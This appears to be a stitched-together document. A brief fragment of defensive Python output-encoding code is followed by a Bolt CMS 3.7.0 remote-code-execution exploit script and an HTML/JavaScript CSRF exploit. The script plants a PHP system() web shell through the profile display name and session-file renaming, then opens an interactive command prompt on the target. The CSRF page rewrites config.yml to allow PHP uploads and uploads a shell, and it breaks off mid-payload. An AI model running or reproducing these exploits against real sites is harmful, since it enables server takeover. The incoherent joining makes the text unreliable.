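    """Assumed template that places the same untrusted value in all three contexts."""
    return (
        f'<p class="name">{html_text(display_name)}</p>\n'
        f'<input name="q" value="{html_attr(display_name)}">\n'
        f"<script>var displayName = {js_string(display_name)};</script>"
    )


def script_block_intact(rendered: str) -> bool:
    """True when the only <script> opener and closer in the output are the template's own."""
    low = rendered.lower()
    return low.count("<script") == 1 and low.count("</script>") == 1


if __name__ == "__main__":
    for sample in (BOLTWIRE, POLYGLOT):
        out = render_profile(sample)
        print(out)
        print("script block intact:", script_block_intact(out), "\n")
```

The check in script_block_intact() is what a template-level test should assert: after rendering hostile input, the page still contains exactly the script elements the template itself wrote. Where a templating engine offers context-aware auto-escaping, that is the better tool; the encoders here show what it has to do.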
            
# Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution
# Date: 2020-04-05
# Exploit Author: r3m0t3nu11
# Vendor Homepage: https://bolt.cm/
# Software Link: https://bolt.cm/
# Version: up to date and 6.x
# Tested on: Linux
# CVE : not-yet-0day

#!/usr/bin/python

import requests
import sys
import warnings
import re
import os
from bs4 import BeautifulSoup
from colorama import init 
from termcolor import colored 
  
init() 
#pip install -r requirements.txt
print(colored('''
 ▄▄▄▄▄▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄  ▄       ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄       ▄▄  ▄▄▄▄▄▄▄▄▄▄▄      
▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌     ▐░░▌▐░░░░░░░░░░░▌     
▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌      ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌   ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀      
▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌▐░▌ ▐░▌▐░▌▐░▌               
▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄      
▐░░░░░░░░░░▌ ▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌  ▐░▌  ▐░▌▐░░░░░░░░░░░▌     
▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌   ▀   ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ 
▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌       ▐░▌          ▐░ 
▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌     ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌       ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌
▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌
 ▀▀▀▀▀▀▀▀▀▀   ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀       ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀

Pre-auth RCE with low credentials
#Zero-way By @r3m0t3nu11 special thanks to @dracula @Mr_Hex''',"blue"))



if len(sys.argv) != 4:
    print((len(sys.argv)))
    print((colored("[~] Usage : ./bolt.py url username password","red")))
    exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]



request = requests.session()
print((colored("[+] Retrieving CSRF token to submit the login form","green")))
page = request.get(url+"/bolt/login")
html_content = page.text
soup = BeautifulSoup(html_content, 'html.parser')
token = soup.findAll('input')[2].get("value")

login_info = {
    "user_login[username]": username,
    "user_login[password]": password,
    "user_login[login]": "",
    "user_login[_token]": token
}

login_request = request.post(url+"/bolt/login", login_info)
print((colored("[+] Login token is : {0}","green")).format(token))


aaa = request.get(url+"/bolt/profile")
soup0 = BeautifulSoup(aaa.content, 'html.parser')
token0 = soup0.findAll('input')[6].get("value")
data_profile = {
    "user_profile[password][first]":"password",
    "user_profile[password][second]":"password",
    "user_profile[email]":"a@a.com",
    "user_profile[displayname]":"<?php system($_GET['test']);?>",
    "user_profile[save]":"",
    "user_profile[_token]":token0
}
profile = request.post(url+'/bolt/profile',data_profile)


cache_csrf = request.get(url+"/bolt/overview/showcases")

soup1 = BeautifulSoup(cache_csrf.text, 'html.parser')
csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token")


asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true")
soup2 = BeautifulSoup(asyncc.text, 'html.parser')
tables = soup2.find_all('span', class_ = 'entry disabled')


print((colored("[+] SESSION INJECTION ","green")))
for all_tables in tables:

    f = open("session.txt","a+")
    f.write(all_tables.text+"\n")
    f.close()
    num_lines = sum(1 for line in open('session.txt'))

    renamePostData = {
        "namespace": "root",
        "parent": "/app/cache/.sessions",
        "oldname": all_tables.text,
        "newname": "../../../public/files/test{}.php".format(num_lines),
        "token": csrf
    }
    rename = request.post(url+"/async/folder/rename", renamePostData)

    try:
        url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines)

        rev = requests.get(url1).text
        r1 = re.findall('php',rev)

        r2 = r1[0]
        if r2 == "php" :
            fileINJ = "test{}".format(num_lines)

            print((colored("[+] FOUND  : "+fileINJ,"green")))

    except IndexError:
        print((colored("[-] Not found.","red")))

new_name = 0
while new_name != 'quit':
    inputs = input(colored("Enter OS command , for exit 'quit' : ","green","on_red"))
    if inputs == "quit" :
        exit()
    else:
        a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs))
        aa = a.text
        r11 = re.findall(r'...displayname";s:..:"([\w\s\W]+)',aa)

        print((r11)[0])
            
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function exploit() {

        var target = "http://127.0.0.1"

        var bolt_admin_url = target + "/bolt";

        var xhr = new XMLHttpRequest();
        xhr.open("POST", bolt_admin_url + "/upload", true);
        xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------130713229751679908527494159");
        xhr.withCredentials = true;
        var body = "-----------------------------130713229751679908527494159\r\n" + 
          "Content-Disposition: form-data; name=\"files[]\"; filename=\"stager.html\"\r\n" + 
          "Content-Type: text/plain\r\n" + 
          "\r\n" + 
          "\x3cscript\x3e\r\n" + 
          "\r\n" + 
          "function exploit(){\r\n" + 
          "\r\n" + 
          "        var bolt_admin_url = \""+bolt_admin_url+"\";\r\n" + 
          "\r\n" + 
          "        var xhr = new XMLHttpRequest();\r\n" + 
          "        \r\n" + 
          "        if(xhr) {\r\n" + 
          "            xhr.open(\'GET\', bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" + 
          "            xhr.onreadystatechange = handler;\r\n" + 
          "            xhr.send();\r\n" + 
          "        }\r\n" + 
          "\r\n" + 
          "        function handler(){\r\n" + 
          "          if (xhr.readyState == 4 && xhr.status == 200) {\r\n" + 
          "                user_page = document.createElement(\'html\');\r\n" + 
          "                user_page.innerHTML = xhr.responseText;\r\n" + 
          "                token_input = (user_page.getElementsByTagName(\'input\')[0]).value;\r\n" + 
          "                console.log(\"Token obtained:\" + token_input);\r\n" + 
          "                ModifyAllowedExtensions(token_input);\r\n" + 
          "                UploadShell();\r\n" + 
          "          }\r\n" + 
          "        }\r\n" + 
          "\r\n" + 
          "        function ModifyAllowedExtensions(token) {\r\n" + 
          "\r\n" + 
          "            var xhr = new XMLHttpRequest();\r\n" + 
          "            xhr.open(\"POST\", bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" + 
          "            xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" + 
          "            xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" + 
          "            xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\r\n" + 
          "            xhr.withCredentials = true;\r\n" + 
          "            var body = \"file_edit%5B_token%5D=\"+token+\"&file_edit%5Bcontents%5D=%23+Database+setup.+The+driver+can+be+either+\\\'sqlite\\\'%2C+\\\'mysql\\\'+or+\\\'postgres\\\'.%0D%0A%23%0D%0A%23+For+SQLite%2C+only+the+databasename+is+required.+However%2C+MySQL+and+PostgreSQL%0D%0A%23+also+require+\\\'username\\\'%2C+\\\'password\\\'%2C+and+optionally+\\\'host\\\'+(+and+\\\'port\\\'+)+if+the+database%0D%0A%23+server+is+not+on+the+same+host+as+the+web+server.%0D%0A%23%0D%0A%23+If+you\\\'re+trying+out+Bolt%2C+just+keep+it+set+to+SQLite+for+now.%0D%0Adatabase%3A%0D%0A++++driver%3A+sqlite%0D%0A++++databasename%3A+bolt%0D%0A%0D%0A%23+The+name+of+the+website%0D%0Asitename%3A+A+sample+site%0D%0Apayoff%3A+The+amazing+payoff+goes+here%0D%0A%0D%0A%23+The+theme+to+use.%0D%0A%23%0D%0A%23+Don\\\'t+edit+the+provided+templates+directly%2C+because+they+_will_+get+updated%0D%0A%23+in+next+releases.+If+you+wish+to+modify+a+default+theme%2C+copy+its+folder%2C+and%0D%0A%23+change+the+name+here+accordingly.%0D%0Atheme%3A+base-2018%0D%0A%0D%0A%23+The+locale+that\\\'ll+be+used+by+the+application.+If+no+locale+is+set+the%0D%0A%23+fallback+locale+is+\\\'en_GB\\\'.+For+available+options%2C+see%3A%0D%0A%23+https%3A%2F%2Fdocs.bolt.cm%2Fother%2Flocales%0D%0A%23%0D%0A%23+In+some+cases+it+may+be+needed+to+specify+(non-standard)+variations+of+the%0D%0A%23+locale+to+get+everything+to+work+as+desired.%0D%0A%23%0D%0A%23+This+can+be+done+as+%5Bnl_NL%2C+Dutch_Netherlands%5D+when+specifying+multiple%0D%0A%23+locales%2C+ensure+the+first+is+a+standard+locale.%0D%0Alocale%3A+en_GB%0D%0A%0D%0A%23+Set+the+timezone+to+be+used+on+the+website.+For+a+list+of+valid+timezone%0D%0A%23+settings%2C+see%3A+http%3A%2F%2Fphp.net%2Fmanual%2Fen%2Ftimezones.php%0D%0A%23+timezone%3A+UTC%0D%0A%0D%0A%23+Set+maintenance+mode+on+or+off.%0D%0A%23%0D%0A%23+While+in+maintenance+mode%2C+only+users+of+level+editor+or+higher+can+access+the%0D%0A%23+site.%0D%0A%23%0D%0A%23+All+other+visitors+are+presented+with+a+notice+t
hat+the+site+is+currently%0D%0A%23+offline.%0D%0A%23%0D%0A%23+The+default+template+file+can+be+found+in+%2Fapp%2Ftheme_defaults%2F+and+overridden%0D%0A%23+with+this+option+using+your+own+theme.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.%0D%0A%23+++++++If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Amaintenance_mode%3A+false%0D%0Amaintenance_template%3A+maintenance_default.twig%0D%0A%0D%0A%23+The+hour+of+the+day+for+the+internal+cron+task+scheduler+to+run+daily%2C+weekly%2C%0D%0A%23+monthly+and+yearly+jobs.%0D%0A%23%0D%0A%23+Default%3A+3+(3+am)%0D%0Acron_hour%3A+3%0D%0A%0D%0A%23+If+your+site+is+reachable+under+different+urls+(say%2C+both+blog.example.org%2F%0D%0A%23+as+well+as+example.org%2F)%2C+it\\\'s+a+good+idea+to+set+one+of+these+as+the%0D%0A%23+canonical%2C+so+it\\\'s+clear+which+is+the+primary+address+of+the+site.%0D%0A%23%0D%0A%23+If+you+include+%60https%3A%2F%2F%60%2C+it+will+be+included+in+the+canonical+urls.%0D%0A%23canonical%3A+example.org%0D%0A%0D%0A%23+Bolt+can+insert+a+%3Clink+rel%3D%22shortcut+icon%22%3E+for+all+pages+on+the+site.%0D%0A%0D%0A%23+Note%3A+The+location+given+is+relative+to+the+currently+selected+theme.+If%0D%0A%23+++++++you+want+to+set+the+icon+yourself%2C+just+don\\\'t+enable+the+following+line.%0D%0A%23favicon%3A+images%2Ffavicon-bolt.ico%0D%0A%0D%0A%23+The+default+content+to+use+for+the+homepage%2C+and+the+template+to+render+it%0D%0A%23+with.+This+can+either+be+a+specific+record+(like+%60page%2F1%60)+or+a+listing+of%0D%0A%23+records+(like+%60entries%60).+In+the+chosen+\\\'homepage_template\\\'%2C+you+will+have%0D%0A%23+%60record%60+or+%60records%60+at+your+disposal%2C+depending+on+the+\\\'homepage\\\'+setting.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on%0D%0A%23+++++++the+website%2C+be+sure+to+check+for+a+theme.
yml+file+in+your+theme\\\'s%0D%0A%23+++++++folder.+If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Ahomepage%3A+homepage%2F1%0D%0Ahomepage_template%3A+index.twig%0D%0A%0D%0A%23+The+default+content+for+the+404+page.+Can+be+an+(array+of)+template+names+or%0D%0A%23+identifiers+for+records%2C+which+will+be+tried+until+a+match+is+found.%0D%0A%23%0D%0A%23+Note%3A+The+record+specified+in+this+parameter+must+be+set+to+\\\'published\\\'.%0D%0Anotfound%3A+%5B+not-found.twig%2C+block%2F404-not-found+%5D%0D%0A%0D%0A%23+The+default+template+for+single+record+pages+on+the%0D%0A%23+site.%0D%0A%23%0D%0A%23+Can+be+overridden+for+each+contenttype+and+for+each+record%2C+if+it+has+a%0D%0A%23+\\\'templateselect\\\'+field.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.%0D%0A%23+++++++If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Arecord_template%3A+record.twig%0D%0A%0D%0A%23+The+default+template+and+amount+of+records+to+use+for+listing-pages+on+the%0D%0A%23+site.%0D%0A%23%0D%0A%23+Can+be+overridden+for+each+contenttype.%0D%0A%23%0D%0A%23+Note+1%3A+Sorting+on+TAXONOMY-pages+will+give+unexpected+results%2C+if+it+has+a%0D%0A%23+++++++++pager.%0D%0A%23+++++++++If+you+need+sorting+on+those%2C+make+sure+you+display+all+the+records+on+one%0D%0A%23+++++++++page.%0D%0A%23%0D%0A%23+Note+2%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s%0D%0A%23+++++++++folder.+If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Alisting_template%3A+listing.twig%0D%0Alisting_records%3A+6%0D%0Alisting_sort%3A+datepublish+DESC%0D%0A%0D%0A%23+Because+of+limitations+on+how+the+underlying+database+queries+work%2C+there+are%0D%0A%23+only+two+options+for+sorting+on+taxonomies.+\\\'ASC\\\'+for+roughly+%2
2oldest+first%22%0D%0A%23+and+\\\'DESC\\\'+for+roughly+\\\'newest+first\\\'.%0D%0Ataxonomy_sort%3A+DESC%0D%0A%0D%0A%23+Template+for+showing+the+search+results.+If+not+defined%2C+uses+the+settings+for%0D%0A%23+listing_template+and+listing_records.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.%0D%0A%23+++++++If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Asearch_results_template%3A+search.twig%0D%0Asearch_results_records%3A+10%0D%0A%0D%0A%23+Add+jQuery+to+the+rendered+HTML%2C+whether+or+not+it\\\'s+added+by+an+extension.%0D%0Aadd_jquery%3A+false%0D%0A%0D%0A%23+The+default+amount+of+records+to+show+on+overview+pages.+Can+be+overridden%0D%0A%23+for+each+contenttype.%0D%0Arecordsperpage%3A+10%0D%0A%0D%0A%23+Settings+for+caching+in+parts+of+Bolt.%0D%0A%23+-+config%3A++++++++Caches+the+parsed+.yml+files+from+%2Fapp%2Fconfig.+It\\\'s+updated%0D%0A%23++++++++++++++++++immediately+when+one+of+the+files+changes+on+disk.+There%0D%0A%23++++++++++++++++++should+be+no+good+reason+to+turn+this+off.%0D%0A%23%0D%0A%23+-+templates%3A+++++Caches+rendered+templates.%0D%0A%23%0D%0A%23+-+request%3A+++++++Caches+rendered+pages+in+the+configured+HTTP+reverse+proxy%0D%0A%23++++++++++++++++++cache%2C+on+GET+%26+HEAD+requests.%0D%0A%23++++++++++++++++++By+default+this+is+handled+by+Syfmony+HTTP+Cache.%0D%0A%23%0D%0A%23+-+duration%3A++++++The+duration+(in+minutes)+for+the+\\\'templates\\\'+and+\\\'request\\\'%0D%0A%23++++++++++++++++++options.+default+is+10+minutes.+Note+that+the+duration+is+set%0D%0A%23++++++++++++++++++on+storing+the+cache.+By+lowering+this+value+you+will+not%0D%0A%23++++++++++++++++++invalidate+currently+cached+items.%0D%0A%23%0D%0A%23+-+authenticated%3A+Cache+\\\'templates\\\'+and+\\\'request\\\'+for+logged-on+users.+In+most%0D%0A%23++++++++++++++++++cases+you+should+*NOT*+enable+this%2C+because+it+will+cau
se%0D%0A%23++++++++++++++++++side-effects+if+the+website+shows+different+content+to%0D%0A%23++++++++++++++++++authenticated+users.%0D%0A%23%0D%0A%23+-+thumbnails%3A++++Caches+thumbnail+generation.%0D%0A%23%0D%0A%23+-+translations%3A++Caches+translation+files.+It+is+recommend+to+leave+this%0D%0A%23++++++++++++++++++enabled.+Only+if+you+develop+extensions+and+work+with%0D%0A%23++++++++++++++++++translation+files+you+should+turn+this+off.%0D%0Acaching%3A%0D%0A++++config%3A+true%0D%0A++++templates%3A+true%0D%0A++++request%3A+false%0D%0A++++duration%3A+10%0D%0A++++authenticated%3A+false%0D%0A++++thumbnails%3A+true%0D%0A++++translations%3A+true%0D%0A%0D%0A%23+Set+\\\'enabled\\\'+to+\\\'true\\\'+to+log+all+content+changes+in+the+database.%0D%0A%23%0D%0A%23+Unless+you+need+to+rigorously+monitor+every+change+to+your+site\\\'s+content%2C+it%0D%0A%23+is+recommended+to+keep+this+disabled.%0D%0Achangelog%3A%0D%0A++++enabled%3A+false%0D%0A%0D%0A%23+Default+settings+for+thumbnails.%0D%0A%23%0D%0A%23+Quality+should+be+between+0+(horrible%2C+small+file)+and+100+(best%2C+huge+file).%0D%0A%23%0D%0A%23+cropping%3A+++++++++++One+of+either+crop%2C+fit%2C+borders%2C+resize.%0D%0A%23+default_thumbnail%3A++The+default+size+of+images%2C+when+using%0D%0A%23+++++++++++++++++++++%7B%7B+record.image%7Cthumbnail()+%7D%7D%0D%0A%23+default_image%3A++++++The+default+size+of+images%2C+when+using%0D%0A%23+++++++++++++++++++++%7B%7B+record.image%7Cimage()+%7D%7D%0D%0A%23+allow_upscale%3A++++++Determines+whether+small+images+will+be+enlarged+to+fit%0D%0A%23+++++++++++++++++++++the+requested+dimensions.%0D%0A%23+browser_cache_time%3A+Sets+the+amount+of+seconds+that+the+browser+will+cache%0D%0A%23+++++++++++++++++++++images+for.+Set+it+to+activate+browser+caching.%0D%0A%23%0D%0A%23+Note%3A+If+you+change+these+values%2C+you+might+need+to+clear+the+cache+before%0D%0A%23+++++++they+show+up.%0D%0Athumbnails%3A%0D%0A++++default_thumbnail%3A+%5B+160%2C+120+%5D%0D%0A++++default_image%3A+%5B+1000%2C+750+%5D%0D%0A
++++quality%3A+80%0D%0A++++cropping%3A+crop%0D%0A++++notfound_image%3A+bolt_assets%3A%2F%2Fimg%2Fdefault_notfound.png%0D%0A++++error_image%3A+bolt_assets%3A%2F%2Fimg%2Fdefault_error.png%0D%0A++++save_files%3A+false%0D%0A++++allow_upscale%3A+false%0D%0A++++exif_orientation%3A+true%0D%0A++++only_aliases%3A+false%0D%0A%23++++browser_cache_time%3A+2592000%0D%0A%0D%0A%23+Define+the+HTML+tags+and+attributes+that+are+allowed+in+\\\'cleaned\\\'+HTML.+This%0D%0A%23+is+used+for+sanitizing+HTML%2C+to+make+sure+there+are+no+undesirable+elements%0D%0A%23+left+in+the+content+that+is+shown+to+users.+For+example%2C+tags+like+%60%3Cscript%3E%60%0D%0A%23+or+%60onclick%60-attributes.%0D%0A%23+Note%3A+enabling+options+in+the+%60wysiwyg%60+settings+will+implicitly+add+items+to%0D%0A%23+the+allowed+tags.+For+example%2C+if+you+set+%60images%3A+true%60%2C+the+%60%3Cimg%3E%60+tag%0D%0A%23+will+be+allowed%2C+regardless+of+it+being+in+the+%60allowed_tags%60+setting.%0D%0Ahtmlcleaner%3A%0D%0A++++allowed_tags%3A+%5B+div%2C+span%2C+p%2C+br%2C+hr%2C+s%2C+u%2C+strong%2C+em%2C+i%2C+b%2C+li%2C+ul%2C+ol%2C+mark%2C+blockquote%2C+pre%2C+code%2C+tt%2C+h1%2C+h2%2C+h3%2C+h4%2C+h5%2C+h6%2C+dd%2C+dl%2C+dt%2C+table%2C+tbody%2C+thead%2C+tfoot%2C+th%2C+td%2C+tr%2C+a%2C+img%2C+address%2C+abbr%2C+iframe%2C+caption%2C+sub%2C+sup%2C+figure%2C+figcaption+%5D%0D%0A++++allowed_attributes%3A+%5B+id%2C+class%2C+style%2C+name%2C+value%2C+href%2C+src%2C+alt%2C+title%2C+width%2C+height%2C+frameborder%2C+allowfullscreen%2C+scrolling%2C+target%2C+colspan%2C+rowspan+%5D%0D%0A%0D%0A%23+Uploaded+file+handling%0D%0A%23%0D%0A%23+You+can+change+the+pattern+match+and+replacement+on+uploaded+files+and+if+the%0D%0A%23+resulting+filename+should+be+transformed+to+lower+case.%0D%0A%23%0D%0A%23+Setting+\\\'autoconfirm%3A+true\\\'+prevents+the+creation+of+temporary+lock+files%0D%0A%23+while+uploading.%0D%0A%23%0D%0A%23+upload%3A%0D%0A%23+++++pattern%3A+\\\'%5B%5EA-Za-z0-9%5C.%5D%2B\\\'%0D%0A%23+++++replacement%3A+\\\'-\\\'%0D%0A%23+++++l
owercase%3A+true%0D%0A%23+++++autoconfirm%3A+false%0D%0A%0D%0A%23+Define+the+file+types+(extensions+to+be+exact)+that+are+acceptable+for+upload%0D%0A%23+in+either+\\\'file\\\'+fields+or+through+the+\\\'files\\\'+screen.%0D%0Aaccept_file_types%3A+%5B+php%2C+twig%2C+html%2C+js%2C+css%2C+scss%2C+gif%2C+jpg%2C+jpeg%2C+png%2C+ico%2C+zip%2C+tgz%2C+txt%2C+md%2C+doc%2C+docx%2C+pdf%2C+epub%2C+xls%2C+xlsx%2C+ppt%2C+pptx%2C+mp3%2C+ogg%2C+wav%2C+m4a%2C+mp4%2C+m4v%2C+ogv%2C+wmv%2C+avi%2C+webm%2C+svg%5D%0D%0A%0D%0A%23+Alternatively%2C+if+you+wish+to+limit+these%2C+uncomment+the+following+list%0D%0A%23+instead.+It+just+includes+file+types+%2F+extensions+that+are+harder+to+exploit.%0D%0A%23+accept_file_types%3A+%5B+gif%2C+jpg%2C+jpeg%2C+png%2C+txt%2C+md%2C+pdf%2C+epub%2C+mp3%2C+svg+%5D%0D%0A%0D%0A%23+If+you+want+to+\\\'brand\\\'+the+Bolt+backend+for+a+client%2C+you+can+change+some+key%0D%0A%23+variables+here%2C+that+determine+the+name+of+the+backend%2C+and+adds+a+primary%0D%0A%23+support%2Fcontact+link+to+the+footer.++Add+a+scheme%2C+like+%60mailto%3A%60+or%0D%0A%23+%60https%3A%2F%2F%60+to+the+email+or+URL.%0D%0A%23%0D%0A%23+Additionally+you+can+change+the+mount+point+for+the+backend%2C+either+for%0D%0A%23+convenience+or+to+obscure+it+from+prying+eyes.%0D%0A%23%0D%0A%23+The+Bolt+backend+is+accessible+as+%60%2Fbolt%2F%60+by+default.+If+you+change+it+here%2C%0D%0A%23+it+will+only+be+accessible+through+the+value+set+in+\\\'path\\\'.%0D%0A%23+Keep+the+path+simple%3A+lowercase+only%2C+no+extra+slashes+or+other+special%0D%0A%23+characters.%0D%0A%23+branding%3A%0D%0A%23+++++name%3A+SuperCMS%0D%0A%23+++++path%3A+%2Fadmin%0D%0A%23+++++provided_by%3A+%5B+supercool%40example.org%2C+%22Supercool+Webdesign+Co.%22+%5D%0D%0A%23+++++news_source%3A+http%3A%2F%2Fnews.example.org%0D%0A%23+++++news_variable%3A+news%0D%0A%0D%0A%23+Show+the+\\\'debug\\\'+nut+in+the+lower+right+corner+for+logged-in+user.+By+default%2C%0D%0A%23+the+debugbar+is+only+shown+to+logged-in+users.+Use+the+\\\'debug_show_loggedof
f\\\'%0D%0A%23+option+to+show+it+to+all+users.+You+probably+do+not+want+to+use+this+in+a%0D%0A%23+production+environment.%0D%0Adebug%3A+true%0D%0Adebug_show_loggedoff%3A+true%0D%0Adebug_permission_audit_mode%3A+false%0D%0Adebug_error_level%3A+8181+++++++++++%23+equivalent+to+E_ALL+%26~+E_NOTICE+%26~+E_DEPRECATED+%26~+E_USER_DEPRECATED+%26~+E_WARNING%0D%0A%23+debug_error_level%3A+-1+++++++++++++++%23+equivalent+to+E_ALL%0D%0Adebug_error_use_symfony%3A+false++++++%23+When+set+to+true%2C+Symfony+Profiler+will+be+used+for+exception+display+when+possible%0D%0Adebug_trace_argument_limit%3A+4+++++++%23+Determine+how+many+steps+in+the+backtrace+will+show+(dump)+arguments.%0D%0A%0D%0A%23+error+level+when+debug+is+disabled%0D%0Aproduction_error_level%3A+8181+%23+%3D+E_ALL+%26~+E_NOTICE+%26~+E_WARNING+%26~+E_DEPRECATED+%26~+E_USER_DEPRECATED%0D%0A%0D%0A%23+System+debug+logging%0D%0A%23+This+will+enable+intensive+logging+of+Silex+functions+and+will+be+very+hard+on%0D%0A%23+performance+and+log+file+size.++++The+log+file+will+be+created+in+your+cache%0D%0A%23+directory.%0D%0A%23%0D%0A%23+Enable+this+for+short+time+periods+only+when+diagnosing+system+issues.%0D%0A%23+The+level+can+be+either%3A+DEBUG%2C+INFO%2C+NOTICE%2C+WARNING%2C+ERROR%2C+CRITICAL%2C+ALERT%2C+EMERGENCY%0D%0Adebuglog%3A%0D%0A++++enabled%3A+false%0D%0A++++filename%3A+bolt-debug.log%0D%0A++++level%3A+DEBUG%0D%0A%0D%0A%23+Use+strict+variables.+This+will+make+Bolt+complain+if+you+use+%7B%7B+foo+%7D%7D%2C%0D%0A%23+when+foo+doesn\\\'t+exist.%0D%0Astrict_variables%3A+false%0D%0A%0D%0A%23+There+are+several+options+for+giving+editors+more+options+to+insert+images%2C%0D%0A%23+video%2C+etc+in+the+WYSIWYG+areas.+But%2C+as+you+give+them+more+options%2C+that%0D%0A%23+means+they+also+have+more+ways+of+breaking+the+preciously+designed+layout.%0D%0A%23%0D%0A%23+By+default+the+most+\\\'dangerous\\\'+options+are+set+to+\\\'false\\\'.+If+you+choose+to%0D%0A%23+enable+them+for+your+editors%2C+please+instruct+them+thoroughly+on+their%0
D%0A%23+responsibility+not+to+break+the+layout.%0D%0Awysiwyg%3A%0D%0A++++images%3A+false++++++++++++%23+Allow+users+to+insert+images+in+the+content.%0D%0A++++anchor%3A+false++++++++++++%23+Adds+a+button+to+create+internal+anchors+to+link+to.%0D%0A++++tables%3A+false++++++++++++%23+Adds+a+button+to+insert+and+modify+tables+in+the+content.%0D%0A++++fontcolor%3A+false+++++++++%23+Allow+users+to+mess+around+with+font+coloring.%0D%0A++++align%3A+false+++++++++++++%23+Adds+buttons+for+\\\'align+left\\\'%2C+\\\'align+right\\\'%2C+etc.%0D%0A++++subsuper%3A+false++++++++++%23+Adds+buttons+for+subscript+and+superscript%2C+using+%60%3Csub%3E%60+and+%60%3Csup%3E%60.%0D%0A++++embed%3A+false+++++++++++++%23+Allows+the+user+to+insert+embedded+video\\\'s+from+Youtube%2C+Vimeo%2C+etc.%0D%0A++++underline%3A+false+++++++++%23+Adds+a+button+to+underline+text%2C+using+the+%60%3Cu%3E%60-tag.%0D%0A++++ruler%3A+false+++++++++++++%23+Adds+a+button+to+add+a+horizontal+ruler%2C+using+the+%60%3Chr%3E%60-tag.%0D%0A++++strike%3A+false++++++++++++%23+Adds+a+button+to+add+stikethrough%2C+using+the+%60%3Cs%3E%60-tag.%0D%0A++++blockquote%3A+false++++++++%23+Allows+the+user+to+insert+blockquotes+using+the+%60%3Cblockquote%3E%60-tag.%0D%0A++++codesnippet%3A+false+++++++%23+Allows+the+user+to+insert+code+snippets+using+%60%3Cpre%3E%3Ccode%3E%60-tags.%0D%0A++++specialchar%3A+false+++++++%23+Adds+a+button+to+insert+special+chars+like+\\\'%E2%82%AC\\\'+or+\\\'%E2%84%A2\\\'.%0D%0A++++clipboard%3A+false+++++++++%23+Adds+buttons+to+\\\'undo\\\'+and+\\\'redo\\\'.%0D%0A++++copypaste%3A+false+++++++++%23+Adds+buttons+to+\\\'cut\\\'%2C+\\\'copy\\\'+and+\\\'paste\\\'.%0D%0A++++ck%3A%0D%0A++++++++autoParagraph%3A+true++%23+If+set+to+\\\'true\\\'%2C+any+pasted+content+is+wrapped+in+%60%3Cp%3E%60-tags+for+multiple+line-breaks%0D%0A++++++++disableNativeSpellChecker%3A+true+%23+If+set+to+\\\'true\\\'+it+will+stop+browsers+from+underlining+spelling+mistakes%0D%0A++++++++allowNbsp%3A+false+++++%23+If+set+to+\\\'false\\\
